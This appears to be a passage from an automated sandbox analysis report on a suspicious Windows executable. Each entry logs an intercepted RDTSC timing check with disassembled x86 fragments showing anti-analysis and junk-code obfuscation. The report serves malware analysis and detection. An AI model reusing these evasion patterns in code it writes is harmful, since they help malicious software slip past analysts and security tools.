Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D25FC3 second address: D25FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F2BDCD5A7A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2716B second address: D27175 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2BDC8ABB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D26FE4 second address: D26FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D27175 second address: D27191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2BDC8ABB23h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D26FFD second address: D27001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D27191 second address: D2721D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F2BDC8ABB18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+12BBE2A4h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F2BDC8ABB18h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov dword ptr [ebp+12A23824h], edx 0x0000004c mov dword ptr [ebp+12A21BADh], esi 0x00000052 push 00000000h 0x00000054 sub dword ptr [ebp+12A22677h], edi 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F2BDC8ABB29h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2721D second address: D27227 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D281EA second address: D281F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D281F0 second address: D28297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F2BDCD5A7A8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+12A226FDh] 0x0000002e mov si, A22Fh 0x00000032 push 00000000h 0x00000034 jmp 00007F2BDCD5A7AEh 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F2BDCD5A7A8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 pushad 0x00000056 add esi, 3D9057A5h 0x0000005c mov al, ch 0x0000005e popad 0x0000005f jnl 00007F2BDCD5A7BAh 0x00000065 xchg eax, ebx 0x00000066 push ebx 0x00000067 jc 00007F2BDCD5A7ACh 0x0000006d pop ebx 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jo 00007F2BDCD5A7ACh 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D28297 second address: D2829B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2971C second address: D2972D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2972D second address: D29746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F2BDC8ABB16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F2BDC8ABB16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D29746 second address: D2974C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2974C second address: D29782 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2BDC8ABB25h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movzx edi, ax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 pop edi 0x00000012 stc 0x00000013 push 00000000h 0x00000015 jno 00007F2BDC8ABB1Ch 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D29782 second address: D2978B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2A0EB second address: D2A0EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2A0EF second address: D2A0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2F969 second address: D2F96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2F96D second address: D2F97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F2BDCD5A7ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2F97B second address: D2F9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F2BDC8ABB18h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub bx, 44CCh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007F2BDC8ABB18h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 mov ebx, 6792B192h 0x0000004a and ebx, dword ptr [ebp+12A229CDh] 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F2BDC8ABB1Ch 0x00000059 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2F9E5 second address: D2F9EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2F9EB second address: D2F9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D308E5 second address: D308EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2FB28 second address: D2FB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2BDC8ABB16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F2BDC8ABB16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2FC05 second address: D2FC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F2BDCD5A7ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2FC17 second address: D2FC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D31899 second address: D3189F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D34894 second address: D34898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D32A79 second address: D32AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 push ebx 0x00000008 mov dword ptr [ebp+12A22BF8h], eax 0x0000000e pop ebx 0x0000000f mov dword ptr [ebp+12A21F14h], eax 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov bl, B9h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 add dword ptr [ebp+12A2387Ah], edi 0x0000002b mov eax, dword ptr [ebp+12A20121h] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F2BDCD5A7A8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007F2BDCD5A7A8h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a pushad 0x0000006b popad 0x0000006c pop eax 0x0000006d pushad 0x0000006e push edi 0x0000006f pop edi 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D33BAC second address: D33BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3595B second address: D35968 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3697C second address: D36982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D35AD3 second address: D35AD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36982 second address: D369FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F2BDC8ABB18h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 clc 0x00000028 push 00000000h 0x0000002a sub bx, 5C37h 0x0000002f add dword ptr [ebp+12A21919h], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F2BDC8ABB18h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 mov dword ptr [ebp+12A221CDh], eax 0x00000057 xchg eax, esi 0x00000058 jmp 00007F2BDC8ABB20h 0x0000005d push eax 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D369FF second address: D36A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36BC2 second address: D36BD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36BD2 second address: D36BD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36BD7 second address: D36BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2BDC8ABB26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BC89 second address: D3BCA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2BDCD5A7ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CD46 second address: D3CD4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BF69 second address: D3BF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BF6F second address: D3BF92 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2BDC8ABB23h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CD4A second address: D3CDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F2BDCD5A7A8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jng 00007F2BDCD5A7ABh 0x0000002c or di, 2A86h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F2BDCD5A7A8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d call 00007F2BDCD5A7B6h 0x00000052 mov edi, dword ptr [ebp+12A2382Dh] 0x00000058 pop edi 0x00000059 xor edi, 2C72D0E7h 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F2BDCD5A7ACh 0x00000067 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BF92 second address: D3BF9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CDD8 second address: D3CDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CF5D second address: D3CFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add di, 8935h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F2BDC8ABB20h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F2BDC8ABB18h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c or ebx, dword ptr [ebp+12A23292h] 0x00000042 mov eax, dword ptr [ebp+12A206E1h] 0x00000048 push FFFFFFFFh 0x0000004a stc 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F2BDC8ABB1Ch 0x00000055 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CFDD second address: D3CFFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3DF4C second address: D3DF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB1Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D46CC0 second address: D46CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D46FF4 second address: D46FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4F9CE second address: D4F9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FB60 second address: D4FB6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FB6A second address: D4FB7F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F2BDCD5A7AEh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FB7F second address: D4FBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007F2BDC8ABB28h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FBA4 second address: D4FBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jng 00007F2BDCD5A7B4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F2BDCD5A7A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FBBC second address: D4FBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE0F20 second address: CE0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE0EF0 second address: CE0F12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB28h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE0F12 second address: CE0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56601 second address: D56607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56607 second address: D5660B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5660B second address: D56619 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D567AE second address: D567CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F2BDCD5A7A8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pushad 0x0000000f jmp 00007F2BDCD5A7ADh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D567CE second address: D567D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56A9B second address: D56AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2BDCD5A7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56AB9 second address: D56AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F2BDC8ABB16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56AC6 second address: D56ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56ACA second address: D56AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56D71 second address: D56D76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5716E second address: D57174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D57174 second address: D57191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2BDCD5A7AAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D59E90 second address: D59E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D59E94 second address: D59E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2C8F1 second address: D2C8F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
